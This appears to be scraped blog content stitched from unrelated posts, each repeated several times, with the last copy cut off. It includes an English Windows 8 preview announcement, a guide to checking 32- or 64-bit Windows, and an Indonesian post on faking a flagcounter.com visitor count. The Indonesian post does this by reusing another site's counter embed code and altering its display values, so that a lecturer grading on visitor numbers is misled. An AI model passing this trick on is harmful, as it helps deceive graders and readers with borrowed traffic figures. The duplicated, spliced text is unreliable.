Windows 8 consumer preview comes up with some features its own, like: Internet Exploler 10, Metro UI Style, Xbox 360 Integration, Windows Store, Cloud SkyDrive support, multy touch, Native USB 3.0 Support, Secure Boot, and more. And for those a BloggerClick's visitors who want to install this Windows 8 consumer preview, I guess You wouldn't get an issue because Windows 8 consumer preview has a low system requirements its own, so that it's not make You annoyed when You're going to install it.




System requirements:
- Processor: Min 1 GHz,
- RAM memory: 1GB (32-bit) / 2 GB RAM (64-bit)
- Hardisk Space: 16 GB (32-bit) / 20 GB (64-bit),
- VGA: Compatible with DirectX 9 and WDDM 1.0.

However, You need to note that this Windows 8 consumer preview come up in beta version, so it's probably you will find some of bugs or it's not compatible with the PC's hardware You have. But for those who has curiosity with this Windows 8 Consumer Preview You can download the link from Official website of Microsoft.

Download Windows 8 Consumer Preview - Many of us might be curious with the new looks of Windows 8 before it launched. Yes, of course before it launched, the Microsoft Inc always create a preview version for consumer, including for this Windows 8 which released in beta version before its final for public, which this preview version will almost the same with the final version of Windows 8 or at least You know how it looks like.

Windows 8 consumer preview comes up with some features its own, like: Internet Exploler 10, Metro UI Style, Xbox 360 Integration, Windows Store, Cloud SkyDrive support, multy touch, Native USB 3.0 Support, Secure Boot, and more. And for those a BloggerClick's visitors who want to install this Windows 8 consumer preview, I guess You wouldn't get an issue because Windows 8 consumer preview has a low system requirements its own, so that it's not make You annoyed when You're going to install it.




System requirements:
- Processor: Min 1 GHz,
- RAM memory: 1GB (32-bit) / 2 GB RAM (64-bit)
- Hardisk Space: 16 GB (32-bit) / 20 GB (64-bit),
- VGA: Compatible with DirectX 9 and WDDM 1.0.

However, You need to note that this Windows 8 consumer preview come up in beta version, so it's probably you will find some of bugs or it's not compatible with the PC's hardware You have. But for those who has curiosity with this Windows 8 Consumer Preview You can download the link from Official website of Microsoft.

How Do I Know My Computer is Running a 32-bit or a 64-bit for Windows 7/XP/Vista

Well, have you asked yourself what kind of version of a bit your computer system you have? is it a running a 32-bit or a 64-bit version of Windows 7/XP/Vista. Some of you might be wondering what version you have. So how can I tell if my computer is running a 32-bit or a 64-bit version of Windows?. But firstly, you need to know the different between both of them.





What is the difference between 32-bit and 64-bit versions of Windows?

Anyway, this time I'm not about to telling you a very detail what's the difference between 32-bit and 64-bit versions of Windows, for more informations you can Google it what's the different between 32-bit and 64-bit versions of your Windows. But here's I can tell you, The terms 32-bit and 64-bit refer to the way a computer's processor (also called a CPU), handles information. The 64-bit version of Windows handles large amounts of random access memory (RAM) more effectively than a 32-bit system. You see that 64-bit it's even better than 32-bit. Check out the screenshot below is mine.



Anyway, it's very easy to find out if your computer is running a 32-bit or 64-bit version of Windows in Windows 7 or Windows Vista, or Windows XP, just follow the simple steps below:

For Windows 7 and Vista:

Step 1. Firstly you need to open System by clicking the "Start" button ,

Step 2. Then you're right-clicking Computer, and then clicking Properties.

Step 3. Now you will see nnder System, you can view the system type. what bit of your system is running.



For Windows XP:

Step 1. Just simply click Start button.

Step 2. Then you're right-click My Computer, and then click Properties.

Step 3. Now if you don't see "x64 Edition" listed, then you're running the 32-bit version of Windows XP. Then if "x64 Edition" is listed under System, you're running the 64-bit version of Windows XP.

Well, have you asked yourself what kind of version of a bit your computer system you have? is it a running a 32-bit or a 64-bit version of Windows 7/XP/Vista. Some of you might be wondering what version you have. So how can I tell if my computer is running a 32-bit or a 64-bit version of Windows?. But firstly, you need to know the different between both of them.





What is the difference between 32-bit and 64-bit versions of Windows?

Anyway, this time I'm not about to telling you a very detail what's the difference between 32-bit and 64-bit versions of Windows, for more informations you can Google it what's the different between 32-bit and 64-bit versions of your Windows. But here's I can tell you, The terms 32-bit and 64-bit refer to the way a computer's processor (also called a CPU), handles information. The 64-bit version of Windows handles large amounts of random access memory (RAM) more effectively than a 32-bit system. You see that 64-bit it's even better than 32-bit. Check out the screenshot below is mine.



Anyway, it's very easy to find out if your computer is running a 32-bit or 64-bit version of Windows in Windows 7 or Windows Vista, or Windows XP, just follow the simple steps below:

For Windows 7 and Vista:

Step 1. Firstly you need to open System by clicking the "Start" button ,

Step 2. Then you're right-clicking Computer, and then clicking Properties.

Step 3. Now you will see nnder System, you can view the system type. what bit of your system is running.



For Windows XP:

Step 1. Just simply click Start button.

Step 2. Then you're right-click My Computer, and then click Properties.

Step 3. Now if you don't see "x64 Edition" listed, then you're running the 32-bit version of Windows XP. Then if "x64 Edition" is listed under System, you're running the 64-bit version of Windows XP.

Well, have you asked yourself what kind of version of a bit your computer system you have? is it a running a 32-bit or a 64-bit version of Windows 7/XP/Vista. Some of you might be wondering what version you have. So how can I tell if my computer is running a 32-bit or a 64-bit version of Windows?. But firstly, you need to know the different between both of them.





What is the difference between 32-bit and 64-bit versions of Windows?

Anyway, this time I'm not about to telling you a very detail what's the difference between 32-bit and 64-bit versions of Windows, for more informations you can Google it what's the different between 32-bit and 64-bit versions of your Windows. But here's I can tell you, The terms 32-bit and 64-bit refer to the way a computer's processor (also called a CPU), handles information. The 64-bit version of Windows handles large amounts of random access memory (RAM) more effectively than a 32-bit system. You see that 64-bit it's even better than 32-bit. Check out the screenshot below is mine.



Anyway, it's very easy to find out if your computer is running a 32-bit or 64-bit version of Windows in Windows 7 or Windows Vista, or Windows XP, just follow the simple steps below:

For Windows 7 and Vista:

Step 1. Firstly you need to open System by clicking the "Start" button ,

Step 2. Then you're right-clicking Computer, and then clicking Properties.

Step 3. Now you will see nnder System, you can view the system type. what bit of your system is running.



For Windows XP:

Step 1. Just simply click Start button.

Step 2. Then you're right-click My Computer, and then click Properties.

Step 3. Now if you don't see "x64 Edition" listed, then you're running the 32-bit version of Windows XP. Then if "x64 Edition" is listed under System, you're running the 64-bit version of Windows XP.

Well, have you asked yourself what kind of version of a bit your computer system you have? is it a running a 32-bit or a 64-bit version of Windows 7/XP/Vista. Some of you might be wondering what version you have. So how can I tell if my computer is running a 32-bit or a 64-bit version of Windows?. But firstly, you need to know the different between both of them.





What is the difference between 32-bit and 64-bit versions of Windows?

Anyway, this time I'm not about to telling you a very detail what's the difference between 32-bit and 64-bit versions of Windows, for more informations you can Google it what's the different between 32-bit and 64-bit versions of your Windows. But here's I can tell you, The terms 32-bit and 64-bit refer to the way a computer's processor (also called a CPU), handles information. The 64-bit version of Windows handles large amounts of random access memory (RAM) more effectively than a 32-bit system. You see that 64-bit it's even better than 32-bit. Check out the screenshot below is mine.



Anyway, it's very easy to find out if your computer is running a 32-bit or 64-bit version of Windows in Windows 7 or Windows Vista, or Windows XP, just follow the simple steps below:

For Windows 7 and Vista:

Step 1. Firstly you need to open System by clicking the "Start" button ,

Step 2. Then you're right-clicking Computer, and then clicking Properties.

Step 3. Now you will see nnder System, you can view the system type. what bit of your system is running.



For Windows XP:

Step 1. Just simply click Start button.

Step 2. Then you're right-click My Computer, and then click Properties.

Step 3. Now if you don't see "x64 Edition" listed, then you're running the 32-bit version of Windows XP. Then if "x64 Edition" is listed under System, you're running the 64-bit version of Windows XP.

Well, have you asked yourself what kind of version of a bit your computer system you have? is it a running a 32-bit or a 64-bit version of Windows 7/XP/Vista. Some of you might be wondering what version you have. So how can I tell if my computer is running a 32-bit or a 64-bit version of Windows?. But firstly, you need to know the different between both of them.





What is the difference between 32-bit and 64-bit versions of Windows?

Anyway, this time I'm not about to telling you a very detail what's the difference between 32-bit and 64-bit versions of Windows, for more informations you can Google it what's the different between 32-bit and 64-bit versions of your Windows. But here's I can tell you, The terms 32-bit and 64-bit refer to the way a computer's processor (also called a CPU), handles information. The 64-bit version of Windows handles large amounts of random access memory (RAM) more effectively than a 32-bit system. You see that 64-bit it's even better than 32-bit. Check out the screenshot below is mine.



Anyway, it's very easy to find out if your computer is running a 32-bit or 64-bit version of Windows in Windows 7 or Windows Vista, or Windows XP, just follow the simple steps below:

For Windows 7 and Vista:

Step 1. Firstly you need to open System by clicking the "Start" button ,

Step 2. Then you're right-clicking Computer, and then clicking Properties.

Step 3. Now you will see nnder System, you can view the system type. what bit of your system is running.



For Windows XP:

Step 1. Just simply click Start button.

Step 2. Then you're right-click My Computer, and then click Properties.

Step 3. Now if you don't see "x64 Edition" listed, then you're running the 32-bit version of Windows XP. Then if "x64 Edition" is listed under System, you're running the 64-bit version of Windows XP.

Memanipulasi Jumlah Pengunjung / Visitor Counter di flagcounter.com

Mudahnyaa "menyedot" jumlah pengunjung web lain menjadi pengunjung kita..

Flagcounter.com memberikan layanan counter pengunjung gratis untuk web kita. Yang membuatnya berbeda dengan counter-counter lain adalah tampilan di counter-nya yang juga menyertakan gambar bendera negara asal pengunjung web kita, lengkap dengan jumlah alamat IP unik plus jumlah pageview web kita. Kalau belum ada gambaran, silahkan lihat gambar di bawah ini, ini adalah flag counter blog ini.
free counters
Ide ini muncul ketika ada salah satu dosen saya yang mewajibkan semua mahasiswa yang mengikuti mata kuliahnya untuk memiliki blog, blog di UIN Blogger tepatnya. Dan tambah lagi, beliau juga akan mengambil tambahan nilai dari jumlah pengunjung blog kita, beliau merekomendasikan counter-nya flagcounter ini.
Otak yang usil ini pun berfikir: "Waduh, kalau mengandalkan nilai dari kuliah jelas nggak bisa nih (soalnya saya dodol di mata kuliah tersebut). Ah.. ada harapan buat mengambil nilai dari jumlah visitor.." :D
Tapi masalahnya, blog saya dulu (waktu menempuh mata kuliah tersebut) nggak laku,, pengunjungnya cuma satu dua,, itupun mungkin pengunjung setan alias bot-bot search engine. Maka harapan untuk mengeruk nilai dari visitor hampir kandas. Bisa saja blog ini saya isi dengan artikel-artikel sepanyol (separo nyolong) dari web orang, biar kelihatan banyak isinya dan menarik pengunjung, tapi copas bukanlah style saya :D
Satu-satunya cara mendapatkan jumlah pengunjung dengan cepat- dan super banyak adalah memanipulasi counternya (kata pikiran nakal di otak saya :D). Pernah terpikirkan untuk membuat gambar palsu (menggambar counter sendiri, jadi bukan counter asli dari flagcounter.com), tapi cara tersebut rasa-rasanya juga kurang gentle :D
Jadi, dengan memanfaatkan beberapa kelemahan di sistem flagcounter, saya bisa memanipulasi jumlah visitor counter dari flagcounter.com. Ngomong-ngomong, apa saja kelemahannya?
  1. Kebanyakan dari penyedia sistem counter memberikan sepotong-dua potong (sebaris-dua baris) kode HTML untuk dipasangkan ke halaman kita, begitupun dengan flagcounter. Ingat, kode tersebut tentu saja terpampang dengan jelas dengan memanfaatkan fitur "View Source Code" di browser.
  2. Layanan gratisan Flagcounter.com ini tidak memberikan halaman detail yang menunjukkan bahwa jumlah pengunjung di counter tersebut adalah benar-benar dari halaman web ini atau itu. Kalau tidak percaya, coba klik pada gambar counter di samping kanan halaman ini, nanti akan masuk ke situs flagcounter.com dan ditampilkan detail dari pengunjung, mulai dari negara, jumlah pengunjung unik-nya, presentase-nya.
    Tapi tidak ada satu keterangan-pun bahwa counter tersebut adalah counter untuk blog saya kan? Seperti di gambar berikut ini:
Ini detail counter-nya siapa yaa?? ga jelas..
Lihat sendiri kan? sama sekali tidak ada informasi bahwa detail yang sedang ditampilkan adalah detail dari blog saya, huhu :D
Oke, langsung saja ke prakteknya. Saya akan memakai contoh flag counter milik saya sendiri.
1. Temukan kode sumber / source code dari halaman yang sedang menampilkan flag counter.
Lewat menu "View Source Code" atau tekan CTRL+U, akan muncul jendela/tab baru yang berisi kode sumber halaman ini.
2. Cari tulisan berikut ini: (gunakan fitur search biar lebih mudah, ini adalah source flagcounter saya)
<a href="http://s08.flagcounter.com/more/fO5I">
<img src="http://s08.flagcounter.com/count/fO5I/bg=EDEDED/txt=000000/border=000000/columns=2/maxflags=20/viewers=Blognya+Goji/labels=1/pageviews=1/" alt="free counters" border="0" width="182">
</a>
tulisan yang berwarna oranye adalah value yang bisa kita ubah, dengan sedikit utak-atik saya pun bisa "menciptakan" beberapa counter baru, dengan jumlah pengunjung yang sama, namun tampilannya sangat jauh berbeda, seperti ini:
free counters
free counters
free counters
Bagaimana? sangat mudah bukan? teman-teman bisa membuktikan betapa meyakinkannya counter ini dengan cara meng-klik-nya, teman-teman akan dibawa ke halaman detail flagcounter.com, semua berjalan lancar, sempurna, tanpa mencurigakan. :D
Solusi
Ada baiknya flagcounter.com menambahkan informasi yang lebih lengkap di halaman detail, meskipun hanya dengan tulisan semisal "Counter Details for http://blablabla", tentunya akan membuat counter ini lebih aman dan lebih susah diakali.
Jadi, jangan kaget kalau di waktu mendatang, counter saya berubah menjadi seperti ini ya:
free counters
Counter bukanlah ajang untuk pamer. Pengunjung memang mungkin akan salut dengan jumlah yang tertera di counter kita. Tapi itupun hanya salut sementara. Yang jauh lebih penting adalah kualitas tulisan kita, jangan asal copy paste, kemukakan ide-ide baru, tuangkan dalam artikel-artikel yang bagus. Tentunya pengunjung akan "ketagihan" datang ke blog kita. Setuju nggak?


sumber

Mudahnyaa "menyedot" jumlah pengunjung web lain menjadi pengunjung kita..

Flagcounter.com memberikan layanan counter pengunjung gratis untuk web kita. Yang membuatnya berbeda dengan counter-counter lain adalah tampilan di counter-nya yang juga menyertakan gambar bendera negara asal pengunjung web kita, lengkap dengan jumlah alamat IP unik plus jumlah pageview web kita. Kalau belum ada gambaran, silahkan lihat gambar di bawah ini, ini adalah flag counter blog ini.
free counters
Ide ini muncul ketika ada salah satu dosen saya yang mewajibkan semua mahasiswa yang mengikuti mata kuliahnya untuk memiliki blog, blog di UIN Blogger tepatnya. Dan tambah lagi, beliau juga akan mengambil tambahan nilai dari jumlah pengunjung blog kita, beliau merekomendasikan counter-nya flagcounter ini.
Otak yang usil ini pun berfikir: "Waduh, kalau mengandalkan nilai dari kuliah jelas nggak bisa nih (soalnya saya dodol di mata kuliah tersebut). Ah.. ada harapan buat mengambil nilai dari jumlah visitor.." :D
Tapi masalahnya, blog saya dulu (waktu menempuh mata kuliah tersebut) nggak laku,, pengunjungnya cuma satu dua,, itupun mungkin pengunjung setan alias bot-bot search engine. Maka harapan untuk mengeruk nilai dari visitor hampir kandas. Bisa saja blog ini saya isi dengan artikel-artikel sepanyol (separo nyolong) dari web orang, biar kelihatan banyak isinya dan menarik pengunjung, tapi copas bukanlah style saya :D
Satu-satunya cara mendapatkan jumlah pengunjung dengan cepat- dan super banyak adalah memanipulasi counternya (kata pikiran nakal di otak saya :D). Pernah terpikirkan untuk membuat gambar palsu (menggambar counter sendiri, jadi bukan counter asli dari flagcounter.com), tapi cara tersebut rasa-rasanya juga kurang gentle :D
Jadi, dengan memanfaatkan beberapa kelemahan di sistem flagcounter, saya bisa memanipulasi jumlah visitor counter dari flagcounter.com. Ngomong-ngomong, apa saja kelemahannya?
  1. Kebanyakan dari penyedia sistem counter memberikan sepotong-dua potong (sebaris-dua baris) kode HTML untuk dipasangkan ke halaman kita, begitupun dengan flagcounter. Ingat, kode tersebut tentu saja terpampang dengan jelas dengan memanfaatkan fitur "View Source Code" di browser.
  2. Layanan gratisan Flagcounter.com ini tidak memberikan halaman detail yang menunjukkan bahwa jumlah pengunjung di counter tersebut adalah benar-benar dari halaman web ini atau itu. Kalau tidak percaya, coba klik pada gambar counter di samping kanan halaman ini, nanti akan masuk ke situs flagcounter.com dan ditampilkan detail dari pengunjung, mulai dari negara, jumlah pengunjung unik-nya, presentase-nya.
    Tapi tidak ada satu keterangan-pun bahwa counter tersebut adalah counter untuk blog saya kan? Seperti di gambar berikut ini:
Ini detail counter-nya siapa yaa?? ga jelas..
Lihat sendiri kan? sama sekali tidak ada informasi bahwa detail yang sedang ditampilkan adalah detail dari blog saya, huhu :D
Oke, langsung saja ke prakteknya. Saya akan memakai contoh flag counter milik saya sendiri.
1. Temukan kode sumber / source code dari halaman yang sedang menampilkan flag counter.
Lewat menu "View Source Code" atau tekan CTRL+U, akan muncul jendela/tab baru yang berisi kode sumber halaman ini.
2. Cari tulisan berikut ini: (gunakan fitur search biar lebih mudah, ini adalah source flagcounter saya)
<a href="http://s08.flagcounter.com/more/fO5I">
<img src="http://s08.flagcounter.com/count/fO5I/bg=EDEDED/txt=000000/border=000000/columns=2/maxflags=20/viewers=Blognya+Goji/labels=1/pageviews=1/" alt="free counters" border="0" width="182">
</a>
tulisan yang berwarna oranye adalah value yang bisa kita ubah, dengan sedikit utak-atik saya pun bisa "menciptakan" beberapa counter baru, dengan jumlah pengunjung yang sama, namun tampilannya sangat jauh berbeda, seperti ini:
free counters
free counters
free counters
Bagaimana? sangat mudah bukan? teman-teman bisa membuktikan betapa meyakinkannya counter ini dengan cara meng-klik-nya, teman-teman akan dibawa ke halaman detail flagcounter.com, semua berjalan lancar, sempurna, tanpa mencurigakan. :D
Solusi
Ada baiknya flagcounter.com menambahkan informasi yang lebih lengkap di halaman detail, meskipun hanya dengan tulisan semisal "Counter Details for http://blablabla", tentunya akan membuat counter ini lebih aman dan lebih susah diakali.
Jadi, jangan kaget kalau di waktu mendatang, counter saya berubah menjadi seperti ini ya:
free counters
Counter bukanlah ajang untuk pamer. Pengunjung memang mungkin akan salut dengan jumlah yang tertera di counter kita. Tapi itupun hanya salut sementara. Yang jauh lebih penting adalah kualitas tulisan kita, jangan asal copy paste, kemukakan ide-ide baru, tuangkan dalam artikel-artikel yang bagus. Tentunya pengunjung akan "ketagihan" datang ke blog kita. Setuju nggak?


sumber

Mudahnyaa "menyedot" jumlah pengunjung web lain menjadi pengunjung kita..

Flagcounter.com memberikan layanan counter pengunjung gratis untuk web kita. Yang membuatnya berbeda dengan counter-counter lain adalah tampilan di counter-nya yang juga menyertakan gambar bendera negara asal pengunjung web kita, lengkap dengan jumlah alamat IP unik plus jumlah pageview web kita. Kalau belum ada gambaran, silahkan lihat gambar di bawah ini, ini adalah flag counter blog ini.
free counters
Ide ini muncul ketika ada salah satu dosen saya yang mewajibkan semua mahasiswa yang mengikuti mata kuliahnya untuk memiliki blog, blog di UIN Blogger tepatnya. Dan tambah lagi, beliau juga akan mengambil tambahan nilai dari jumlah pengunjung blog kita, beliau merekomendasikan counter-nya flagcounter ini.
Otak yang usil ini pun berfikir: "Waduh, kalau mengandalkan nilai dari kuliah jelas nggak bisa nih (soalnya saya dodol di mata kuliah tersebut). Ah.. ada harapan buat mengambil nilai dari jumlah visitor.." :D
Tapi masalahnya, blog saya dulu (waktu menempuh mata kuliah tersebut) nggak laku,, pengunjungnya cuma satu dua,, itupun mungkin pengunjung setan alias bot-bot search engine. Maka harapan untuk mengeruk nilai dari visitor hampir kandas. Bisa saja blog ini saya isi dengan artikel-artikel sepanyol (separo nyolong) dari web orang, biar kelihatan banyak isinya dan menarik pengunjung, tapi copas bukanlah style saya :D
Satu-satunya cara mendapatkan jumlah pengunjung dengan cepat- dan super banyak adalah memanipulasi counternya (kata pikiran nakal di otak saya :D). Pernah terpikirkan untuk membuat gambar palsu (menggambar counter sendiri, jadi bukan counter asli dari flagcounter.com), tapi cara tersebut rasa-rasanya juga kurang gentle :D
Jadi, dengan memanfaatkan beberapa kelemahan di sistem flagcounter, saya bisa memanipulasi jumlah visitor counter dari flagcounter.com. Ngomong-ngomong, apa saja kelemahannya?
  1. Kebanyakan dari penyedia sistem counter memberikan sepotong-dua potong (sebaris-dua baris) kode HTML untuk dipasangkan ke halaman kita, begitupun dengan flagcounter. Ingat, kode tersebut tentu saja terpampang dengan jelas dengan memanfaatkan fitur "View Source Code" di browser.
  2. Layanan gratisan Flagcounter.com ini tidak memberikan halaman detail yang menunjukkan bahwa jumlah pengunjung di counter tersebut adalah benar-benar dari halaman web ini atau itu. Kalau tidak percaya, coba klik pada gambar counter di samping kanan halaman ini, nanti akan masuk ke situs flagcounter.com dan ditampilkan detail dari pengunjung, mulai dari negara, jumlah pengunjung unik-nya, presentase-nya.
    Tapi tidak ada satu keterangan-pun bahwa counter tersebut adalah counter untuk blog saya kan? Seperti di gambar berikut ini:
Ini detail counter-nya siapa yaa?? ga jelas..
Lihat sendiri kan? sama sekali tidak ada informasi bahwa detail yang sedang ditampilkan adalah detail dari blog saya, huhu :D
Oke, langsung saja ke prakteknya. Saya akan memakai contoh flag counter milik saya sendiri.
1. Temukan kode sumber / source code dari halaman yang sedang menampilkan flag counter.
Lewat menu "View Source Code" atau tekan CTRL+U, akan muncul jendela/tab baru yang berisi kode sumber halaman ini.
2. Cari tulisan berikut ini: (gunakan fitur search biar lebih mudah, ini adalah source flagcounter saya)
<a href="http://s08.flagcounter.com/more/fO5I">
<img src="http://s08.flagcounter.com/count/fO5I/bg=EDEDED/txt=000000/border=000000/columns=2/maxflags=20/viewers=Blognya+Goji/labels=1/pageviews=1/" alt="free counters" border="0" width="182">
</a>
tulisan yang berwarna oranye adalah value yang bisa kita ubah, dengan sedikit utak-atik saya pun bisa "menciptakan" beberapa counter baru, dengan jumlah pengunjung yang sama, namun tampilannya sangat jauh berbeda, seperti ini:
free counters
free counters
free counters
Bagaimana? sangat mudah bukan? teman-teman bisa membuktikan betapa meyakinkannya counter ini dengan cara meng-klik-nya, teman-teman akan dibawa ke halaman detail flagcounter.com, semua berjalan lancar, sempurna, tanpa mencurigakan. :D
Solusi
Ada baiknya flagcounter.com menambahkan informasi yang lebih lengkap di halaman detail, meskipun hanya dengan tulisan semisal "Counter Details for http://blablabla", tentunya akan membuat counter ini lebih aman dan lebih susah diakali.
Jadi, jangan kaget kalau di waktu mendatang, counter saya berubah menjadi seperti ini ya:
free counters
Counter bukanlah ajang untuk pamer. Pengunjung memang mungkin akan salut dengan jumlah yang tertera di counter kita. Tapi itupun hanya salut sementara. Yang jauh lebih penting adalah kualitas tulisan kita, jangan asal copy paste, kemukakan ide-ide baru, tuangkan dalam artikel-artikel yang bagus. Tentunya pengunjung akan "ketagihan" datang ke blog kita. Setuju nggak?


sumber

Mudahnyaa "menyedot" jumlah pengunjung web lain menjadi pengunjung kita..

Flagcounter.com memberikan layanan counter pengunjung gratis untuk web kita. Yang membuatnya berbeda dengan counter-counter lain adalah tampilan di counter-nya yang juga menyertakan gambar bendera negara asal pengunjung web kita, lengkap dengan jumlah alamat IP unik plus jumlah pageview web kita. Kalau belum ada gambaran, silahkan lihat gambar di bawah ini, ini adalah flag counter blog ini.
free counters
Ide ini muncul ketika ada salah satu dosen saya yang mewajibkan semua mahasiswa yang mengikuti mata kuliahnya untuk memiliki blog, blog di UIN Blogger tepatnya. Dan tambah lagi, beliau juga akan mengambil tambahan nilai dari jumlah pengunjung blog kita, beliau merekomendasikan counter-nya flagcounter ini.
Otak yang usil ini pun berfikir: "Waduh, kalau mengandalkan nilai dari kuliah jelas nggak bisa nih (soalnya saya dodol di mata kuliah tersebut). Ah.. ada harapan buat mengambil nilai dari jumlah visitor.." :D
Tapi masalahnya, blog saya dulu (waktu menempuh mata kuliah tersebut) nggak laku,, pengunjungnya cuma satu dua,, itupun mungkin pengunjung setan alias bot-bot search engine. Maka harapan untuk mengeruk nilai dari visitor hampir kandas. Bisa saja blog ini saya isi dengan artikel-artikel sepanyol (separo nyolong) dari web orang, biar kelihatan banyak isinya dan menarik pengunjung, tapi copas bukanlah style saya :D
Satu-satunya cara mendapatkan jumlah pengunjung dengan cepat- dan super banyak adalah memanipulasi counternya (kata pikiran nakal di otak saya :D). Pernah terpikirkan untuk membuat gambar palsu (menggambar counter sendiri, jadi bukan counter asli dari flagcounter.com), tapi cara tersebut rasa-rasanya juga kurang gentle :D
Jadi, dengan memanfaatkan beberapa kelemahan di sistem flagcounter, saya bisa memanipulasi jumlah visitor counter dari flagcounter.com. Ngomong-ngomong, apa saja kelemahannya?
  1. Kebanyakan dari penyedia sistem counter memberikan sepotong-dua potong (sebaris-dua baris) kode HTML untuk dipasangkan ke halaman kita, begitupun dengan flagcounter. Ingat, kode tersebut tentu saja terpampang dengan jelas dengan memanfaatkan fitur "View Source Code" di browser.
  2. Layanan gratisan Flagcounter.com ini tidak memberikan halaman detail yang menunjukkan bahwa jumlah pengunjung di counter tersebut adalah benar-benar dari halaman web ini atau itu. Kalau tidak percaya, coba klik pada gambar counter di samping kanan halaman ini, nanti akan masuk ke situs flagcounter.com dan ditampilkan detail dari pengunjung, mulai dari negara, jumlah pengunjung unik-nya, presentase-nya.
    Tapi tidak ada satu keterangan-pun bahwa counter tersebut adalah counter untuk blog saya kan? Seperti di gambar berikut ini:
Ini detail counter-nya siapa yaa?? ga jelas..
Lihat sendiri kan? sama sekali tidak ada informasi bahwa detail yang sedang ditampilkan adalah detail dari blog saya, huhu :D
Oke, langsung saja ke prakteknya. Saya akan memakai contoh flag counter milik saya sendiri.
1. Temukan kode sumber / source code dari halaman yang sedang menampilkan flag counter.
Lewat menu "View Source Code" atau tekan CTRL+U, akan muncul jendela/tab baru yang berisi kode sumber halaman ini.
2. Cari tulisan berikut ini: (gunakan fitur search biar lebih mudah, ini adalah source flagcounter saya)
<a href="http://s08.flagcounter.com/more/fO5I">
<img src="http://s08.flagcounter.com/count/fO5I/bg=EDEDED/txt=000000/border=000000/columns=2/maxflags=20/viewers=Blognya+Goji/labels=1/pageviews=1/" alt="free counters" border="0" width="182">
</a>
tulisan yang berwarna oranye adalah value yang bisa kita ubah, dengan sedikit utak-atik saya pun bisa "menciptakan" beberapa counter baru, dengan jumlah pengunjung yang sama, namun tampilannya sangat jauh berbeda, seperti ini:
free counters
free counters
free counters
Bagaimana? sangat mudah bukan? teman-teman bisa membuktikan betapa meyakinkannya counter ini dengan cara meng-klik-nya, teman-teman akan dibawa ke halaman detail flagcounter.com, semua berjalan lancar, sempurna, tanpa mencurigakan. :D
Solusi
Ada baiknya flagcounter.com menambahkan informasi yang lebih lengkap di halaman detail, meskipun hanya dengan tulisan semisal "Counter Details for http://blablabla", tentunya akan membuat counter ini lebih aman dan lebih susah diakali.
Jadi, jangan kaget kalau di waktu mendatang, counter saya berubah menjadi seperti ini ya:
free counters
Counter bukanlah ajang untuk pamer. Pengunjung memang mungkin akan salut dengan jumlah yang tertera di counter kita. Tapi itupun hanya salut sementara. Yang jauh lebih penting adalah kualitas tulisan kita, jangan asal copy paste, kemukakan ide-ide baru, tuangkan dalam artikel-artikel yang bagus. Tentunya pengunjung akan "ketagihan" datang ke blog kita. Setuju nggak?


sumber

Mudahnyaa "menyedot" jumlah pengunjung web lain menjadi pengunjung kita..

Flagcounter.com memberikan layanan counter pengunjung gratis untuk web kita. Yang membuatnya berbeda dengan counter-counter lain adalah tampilan di counter-nya yang juga menyertakan gambar bendera negara asal pengunjung web kita, lengkap dengan jumlah alamat IP unik plus jumlah pageview web kita. Kalau belum ada gambaran, silahkan lihat gambar di bawah ini, ini adalah flag counter blog ini.
free counters
Ide ini muncul ketika ada salah satu dosen saya yang mewajibkan semua mahasiswa yang mengikuti mata kuliahnya untuk memiliki blog, blog di UIN Blogger tepatnya. Dan tambah lagi, beliau juga akan mengambil tambahan nilai dari jumlah pengunjung blog kita, beliau merekomendasikan counter-nya flagcounter ini.
Otak yang usil ini pun berfikir: "Waduh, kalau mengandalkan nilai dari kuliah jelas nggak bisa nih (soalnya saya dodol di mata kuliah tersebut). Ah.. ada harapan buat mengambil nilai dari jumlah visitor.." :D
Tapi masalahnya, blog saya dulu (waktu menempuh mata kuliah tersebut) nggak laku,, pengunjungnya cuma satu dua,, itupun mungkin pengunjung setan alias bot-bot search engine. Maka harapan untuk mengeruk nilai dari visitor hampir kandas. Bisa saja blog ini saya isi dengan artikel-artikel sepanyol (separo nyolong) dari web orang, biar kelihatan banyak isinya dan menarik pengunjung, tapi copas bukanlah style saya :D
Satu-satunya cara mendapatkan jumlah pengunjung dengan cepat- dan super banyak adalah memanipulasi counternya (kata pikiran nakal di otak saya :D). Pernah terpikirkan untuk membuat gambar palsu (menggambar counter sendiri, jadi bukan counter asli dari flagcounter.com), tapi cara tersebut rasa-rasanya juga kurang gentle :D
Jadi, dengan memanfaatkan beberapa kelemahan di sistem flagcounter, saya bisa memanipulasi jumlah visitor counter dari flagcounter.com. Ngomong-ngomong, apa saja kelemahannya?
  1. Kebanyakan dari penyedia sistem counter memberikan sepotong-dua potong (sebaris-dua baris) kode HTML untuk dipasangkan ke halaman kita, begitupun dengan flagcounter. Ingat, kode tersebut tentu saja terpampang dengan jelas dengan memanfaatkan fitur "View Source Code" di browser.
  2. Layanan gratisan Flagcounter.com ini tidak memberikan halaman detail yang menunjukkan bahwa jumlah pengunjung di counter tersebut adalah benar-benar dari halaman web ini atau itu. Kalau tidak percaya, coba klik pada gambar counter di samping kanan halaman ini, nanti akan masuk ke situs flagcounter.com dan ditampilkan detail dari pengunjung, mulai dari negara, jumlah pengunjung unik-nya, presentase-nya.
    Tapi tidak ada satu keterangan-pun bahwa counter tersebut adalah counter untuk blog saya kan? Seperti di gambar berikut ini:
Ini detail counter-nya siapa yaa?? ga jelas..
Lihat sendiri kan? sama sekali tidak ada informasi bahwa detail yang sedang ditampilkan adalah detail dari blog saya, huhu :D
Oke, langsung saja ke prakteknya. Saya akan memakai contoh flag counter milik saya sendiri.
1. Temukan kode sumber / source code dari halaman yang sedang menampilkan flag counter.
Lewat menu "View Source Code" atau tekan CTRL+U, akan muncul jendela/tab baru yang berisi kode sumber halaman ini.
2. Cari tulisan berikut ini: (gunakan fitur search biar lebih mudah, ini adalah source flagcounter saya)
<a href="http://s08.flagcounter.com/more/fO5I">
<img src="http://s08.flagcounter.com/count/fO5I/bg=EDEDED/txt=000000/border=000000/columns=2/maxflags=20/viewers=Blognya+Goji/labels=1/pageviews=1/" alt="free counters" border="0" width="182">
</a>
tulisan yang berwarna oranye adalah value yang bisa kita ubah, dengan sedikit utak-atik saya pun bisa "menciptakan" beberapa counter baru, dengan jumlah pengunjung yang sama, namun tampilannya sangat jauh berbeda, seperti ini:
free counters
free counters
free counters
Bagaimana? sangat mudah bukan? teman-teman bisa membuktikan betapa meyakinkannya counter ini dengan cara meng-klik-nya, teman-teman akan dibawa ke halaman detail flagcounter.com, semua berjalan lancar, sempurna, tanpa mencurigakan. :D
Solusi
